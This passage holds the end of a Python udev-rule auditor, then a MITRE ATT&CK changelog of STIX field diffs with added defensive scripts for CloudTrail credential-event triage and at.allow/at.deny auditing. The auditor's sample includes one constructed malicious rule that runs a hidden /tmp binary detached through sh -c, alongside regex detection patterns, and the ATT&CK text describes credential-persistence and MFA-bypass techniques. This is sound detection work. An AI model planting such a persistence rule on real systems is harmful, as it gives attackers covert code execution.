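TOKEN = re.compile(r'([A-Z_]+(?:\{[^}]*\})?)\s*(==|!=|\+=|-=|:=|=)\s*"([^"]*)"')
DETACH = re.compile(r"""(?:^|[\s;|(&'"])(?:nohup|setsid|systemd-run|disown|at|batch)\b|&\s*(?:$|['")])""")
SHELL = re.compile(r"(?:^|/)(?:ba|da|z|k)?sh\s+-c\b")
WRITABLE = re.compile(r"""(?:^|[\s='"])/(?:tmp|var/tmp|dev/shm)/""")
PSEUDO_DEVICES = {"random", "urandom", "null", "zero", "full"}  # assumption: common pseudo-device names


def parse_rule(line):
    """Tokenise one udev rule into (key, operator, value) triples; [] for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    return TOKEN.findall(line)


def assess_rule(tokens):
    """Reasons a rule deserves review; an empty list means nothing stood out."""
    reasons, pseudo = [], None
    for key, op, val in tokens:
        base = key.split("{", 1)[0]
        if base == "RUN" and op in ("+=", "=", ":="):
            if SHELL.search(val):
                reasons.append("RUN invokes a shell with -c")
            if DETACH.search(val):
                reasons.append("RUN detaches or backgrounds its process")
            if WRITABLE.search(val):
                reasons.append("RUN references a world-writable path")
        elif base == "KERNEL" and op == "==" and val in PSEUDO_DEVICES:
            pseudo = val
    if reasons and pseudo:
        reasons.append(f"triggered by pseudo-device /dev/{pseudo}")
    return reasons


def audit_rules(text, source="<inline>"):
    """Audit rule text line by line; returns one dict per suspicious rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        reasons = assess_rule(parse_rule(line))
        if reasons:
            findings.append({"source": source, "line": lineno, "rule": line.strip(), "reasons": reasons})
    return findings


def audit_system(dirs=RULE_DIRS):
    """Walk the real rule directories in precedence order (needs read access; not used by the sample)."""
    findings = []
    for d in dirs:
        for path in sorted(Path(d).glob("*.rules")):
            try:
                findings += audit_rules(path.read_text(errors="replace"), str(path))
            except OSError:
                continue
    return findings


SAMPLE_RULES = """\
# constructed sample: two ordinary rules and one matching the pattern described above
ACTION=="add", SUBSYSTEM=="usb", RUN+="/usr/local/bin/usb-notify %k"
SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="00:11:22:33:44:55", NAME="eth0"
ACTION=="add", KERNEL=="random", RUN+="/bin/sh -c 'nohup /tmp/.cache/update >/dev/null 2>&1 &'"
"""

if __name__ == "__main__":
    for f in audit_rules(SAMPLE_RULES, "sample.rules"):
        print(f"{f['source']}:{f['line']}: {f['rule']}")
        for r in f["reasons"]:
            print("   -", r)
```

Because the rule directories are root-writable only, a change there is itself worth alerting on; this audit is for confirming what a modified file does once file-integrity monitoring has pointed at it.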
Minor Version Changes
[T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 15:56:55.022000+00:00 | 2024-09-25 20:48:04.491000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1558.004] Steal or Forge Kerberos Tickets: AS-REP Roasting
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-06-07 19:23:33.039000+00:00 | 2024-10-15 15:32:07.850000+00:00 |
external_references[1]['description'] | HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020. | HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September 23, 2024. |
external_references[1]['url'] | http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ | https://blog.harmj0y.net/activedirectory/roasting-as-reps/ |
x_mitre_version | 1.0 | 1.1 |
[T1548] Abuse Elevation Control Mechanism
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-15 20:52:09.908000+00:00 | 2024-10-15 15:32:21.811000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[5] | Google Workspace | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
[T1531] Account Access Removal
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 20:39:15.680000+00:00 | 2024-10-15 15:35:13.577000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | IaaS |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
[T1087] Account Discovery
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-12 23:36:56.245000+00:00 | 2024-10-15 15:35:28.784000+00:00 |
x_mitre_version | 2.4 | 2.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1098] Account Manipulation
Current version: 2.7
Version changed from: 2.6 → 2.7
New Mitigations:
- M1022: Restrict File and Directory Permissions
- M1042: Disable or Remove Feature or Program
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-16 22:24:38.234000+00:00 | 2024-10-15 15:35:57.382000+00:00 |
x_mitre_version | 2.6 | 2.7 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1137.006] Office Application Startup: Add-ins
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-16 21:26:09.296000+00:00 | 2024-10-15 15:37:09.190000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1098.001] Account Manipulation: Additional Cloud Credentials
Current version: 2.8
Version changed from: 2.7 → 2.8
New Mitigations:
- M1042: Disable or Remove Feature or Program
New Detections:
- DS0026: Active Directory (Active Directory Object Creation)
- DS0026: Active Directory (Active Directory Object Modification)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-28 14:35:00.862000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence) | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)
In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords) |
x_mitre_version | 2.7 | 2.8 |
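The new description names the AWS calls that attach a credential to a principal (CreateAccessKey, CreateLoginProfile, CreateKeyPair/ImportKeyPair, sts:GetFederationToken) and ties the escalation risk to the case where the target account differs from the requesting one. As an added example, not part of the ATT&CK content or any MITRE tooling, here is a small CloudTrail triage script that flags those calls and raises severity when the credential is added to a principal other than the caller. Field names follow the documented CloudTrail record shape (eventName, userIdentity, requestParameters, errorCode); the records at the bottom are constructed samples, and the account id is the AWS documentation placeholder.

```python
"""Triage AWS CloudTrail records for credential-adding API calls (T1098.001).

Added example for this changelog entry; not ATT&CK or MITRE code. Record
fields follow the public CloudTrail format; the sample records at the
bottom are constructed, not real telemetry.
"""
import json

# API calls named in the technique description that attach a new credential
# to a principal, mapped to a short label for the finding.
CREDENTIAL_EVENTS = {
    "CreateAccessKey": "long-lived access key",
    "CreateLoginProfile": "console password",
    "CreateKeyPair": "EC2 SSH key pair",
    "ImportKeyPair": "imported EC2 SSH key pair",
    "GetFederationToken": "temporary federation credentials",
}


def caller_name(event):
    """Name of the identity that made the call.

    IAM users carry userName directly; assumed-role sessions carry the role
    name under sessionContext.sessionIssuer. Falls back to the ARN.
    """
    ident = event.get("userIdentity", {})
    if ident.get("userName"):
        return ident["userName"]
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("userName") or ident.get("arn", "unknown")


def target_name(event):
    """IAM user that receives the credential, when the API names one.

    CreateAccessKey and CreateLoginProfile take a userName parameter; key-pair
    and federation-token calls do not target another principal.
    """
    params = event.get("requestParameters") or {}
    return params.get("userName")


def classify(event):
    """Return a finding dict for a credential-adding call, else None."""
    name = event.get("eventName")
    if name not in CREDENTIAL_EVENTS:
        return None
    caller = caller_name(event)
    target = target_name(event)
    # A credential added to a *different* principal is the escalation pattern
    # the description calls out, so it gets the higher severity.
    cross_principal = target is not None and target != caller
    return {
        "event": name,
        "kind": CREDENTIAL_EVENTS[name],
        "caller": caller,
        "target": target or caller,
        "denied": bool(event.get("errorCode")),  # keep failed attempts too
        "severity": "high" if cross_principal else "medium",
    }


def scan(json_lines):
    """Parse newline-delimited CloudTrail records and return all findings."""
    findings = []
    for line in json_lines.splitlines():
        if line.strip():
            finding = classify(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (account id is the AWS documentation placeholder).
SAMPLE_RECORDS = [
    {"eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "svc-backup"}},
    {"eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"userName": "alice"}},
    {"eventName": "DescribeInstances",
     "userIdentity": {"type": "IAMUser", "userName": "alice"}},
    {"eventName": "CreateLoginProfile",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/Deploy/ci",
                      "sessionContext": {"sessionIssuer": {"userName": "Deploy"}}},
     "requestParameters": {"userName": "admin2"},
     "errorCode": "AccessDenied"},
    {"eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "requestParameters": {"name": "bob-fed", "durationSeconds": 129600}},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Denied calls are kept as findings on purpose: an AccessDenied on CreateLoginProfile from a CI role is still worth a look, since it shows the attempt even though no credential was created. GetFederationToken never names another principal, so it is reported at medium severity regardless; its value to a reviewer is that, as the description notes, the resulting session outlives deactivation of the caller's long-lived keys.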
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Lacework AI Resource Hijacking 2024', 'description': 'Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs. Retrieved July 1, 2024.', 'url': 'https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts'} |
external_references | | {'source_name': 'Permiso Scattered Spider 2023', 'description': 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.', 'url': 'https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud'} |
external_references | | {'source_name': 'Microsoft Entra ID App Passwords', 'description': 'Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor authentication with legacy applications using app passwords. Retrieved May 28, 2024.', 'url': 'https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords'} |
external_references | | {'source_name': 'Mandiant APT42 Operations 2024', 'description': "Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved May 28, 2024.", 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations'} |
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Active Directory: Active Directory Object Creation |
x_mitre_data_sources | | Active Directory: Active Directory Object Modification |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
[T1098.003] Account Manipulation: Additional Cloud Roles
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-29 18:29:06.873000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
[T1098.002] Account Manipulation: Additional Email Delegate Permissions
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-03 15:46:06.706000+00:00 | 2024-10-15 15:37:25.303000+00:00 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Nilesh Dherange (Gurucul) |
x_mitre_contributors | | Naveen Vijayaraghavan |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | Naveen Vijayaraghavan, Nilesh Dherange (Gurucul) | |
x_mitre_platforms | Google Workspace | |
[T1550.001] Use Alternate Authentication Material: Application Access Token
Current version: 1.7
Version changed from: 1.6 → 1.7
New Mitigations:
- M1036: Account Use Policies
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-28 15:43:18.080000+00:00 | 2024-10-15 15:38:11.583000+00:00 |
x_mitre_version | 1.6 | 1.7 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
x_mitre_platforms | Azure AD | |
[T1499.003] Endpoint Denial of Service: Application Exhaustion Flood
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 18:07:45.176000+00:00 | 2024-10-15 15:41:49.168000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1071] Application Layer Protocol
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-17 22:52:23.454000+00:00 | 2024-08-28 14:10:33.145000+00:00 |
description | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) |
x_mitre_version | 2.2 | 2.3 |
[T1499.004] Endpoint Denial of Service: Application or System Exploitation
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-25 18:11:13.604000+00:00 | 2024-10-15 15:42:23.001000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1053.002] Scheduled Task/Job: At
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-11-15 14:38:10.876000+00:00 | 2024-10-12 15:53:12.333000+00:00 |
description | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo .(Citation: GTFObins at) | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo .(Citation: GTFObins at) |
external_references[4]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved September 12, 2024. |
external_references[4]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://x.com/leoloobeek/status/939248813465853953 |
x_mitre_version | 2.2 | 2.3 |
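The description spells out the at.allow / at.deny access rules on Linux and macOS precisely enough to encode them. As an added example, not part of the ATT&CK content or any MITRE tooling, here is a small audit helper that evaluates those rules for a list of users, so a defender can check which accounts on a host are able to schedule at jobs and whether the baseline (neither file present, superuser only) has drifted. The /etc/at.allow and /etc/at.deny paths are the conventional locations documented in at(1); the scenario in the main block is constructed.

```python
"""Evaluate who may invoke at(1) under the at.allow / at.deny rules (T1053.002).

Added example for this changelog entry; not ATT&CK or MITRE code. It encodes
the access rules quoted in the technique description so a defender can audit
a host's baseline. The /etc/at.allow and /etc/at.deny paths are the
conventional locations documented in at(1).
"""
import os

SUPERUSER = "root"
ALLOW_PATH = "/etc/at.allow"
DENY_PATH = "/etc/at.deny"


def parse_access_file(text):
    """at.allow/at.deny hold one username per line; ignore blank lines."""
    return {line.strip() for line in text.splitlines() if line.strip()}


def may_use_at(user, allow=None, deny=None):
    """Decide whether `user` may invoke at.

    `allow` and `deny` are the file contents as text, or None when the file
    does not exist. Rules, in the order the description gives them:
      1. the superuser may always invoke at;
      2. if at.allow exists, only users listed in it may (at.deny is ignored);
      3. else if at.deny exists, every user NOT listed may, so an empty
         at.deny permits everyone;
      4. if neither exists (the common baseline), only the superuser may.
    """
    if user == SUPERUSER:
        return True
    if allow is not None:
        return user in parse_access_file(allow)
    if deny is not None:
        return user not in parse_access_file(deny)
    return False


def audit(users, allow=None, deny=None):
    """Map each candidate user to whether they may invoke at."""
    return {u: may_use_at(u, allow, deny) for u in users}


def read_optional(path):
    """Return file contents, or None if the file is absent."""
    try:
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    except FileNotFoundError:
        return None


def audit_host(users, allow_path=ALLOW_PATH, deny_path=DENY_PATH):
    """Audit the running host using its real at.allow / at.deny files."""
    return audit(users, read_optional(allow_path), read_optional(deny_path))


if __name__ == "__main__":
    # Constructed scenario: at.deny exists but is empty, so everyone may use at.
    print(audit(["root", "alice", "bob"], allow=None, deny=""))
    # Live check of this host for root and the current user.
    print(audit_host(["root", os.environ.get("USER", "nobody")]))
```

The case worth watching in practice is rule 3: an empty at.deny is easy to leave behind from packaging or a hardening script and silently opens at to every local account, which is the condition the description's restricted-environment and sudo abuse cases build on.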
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Malicious Life by Cybereason', 'description': 'Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.', 'url': 'https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe'} |
[T1119] Automated Collection
Current version: 1.3
Version changed from: 1.2 → 1.3
New Detections:
- DS0002: User Account (User Account Authentication)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-02 13:35:57.680000+00:00 | 2024-09-25 20:40:07.791000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | User Account: User Account Authentication |
x_mitre_platforms | | Office Suite |
[T1552.003] Unsecured Credentials: Bash History
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-08 21:34:44.728000+00:00 | 2024-09-12 15:24:04.912000+00:00 |
external_references[1]['description'] | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved September 12, 2024. |
external_references[1]['url'] | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way | https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418 |
x_mitre_version | 1.1 | 1.2 |
[T1110] Brute Force
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-29 18:53:26.593000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
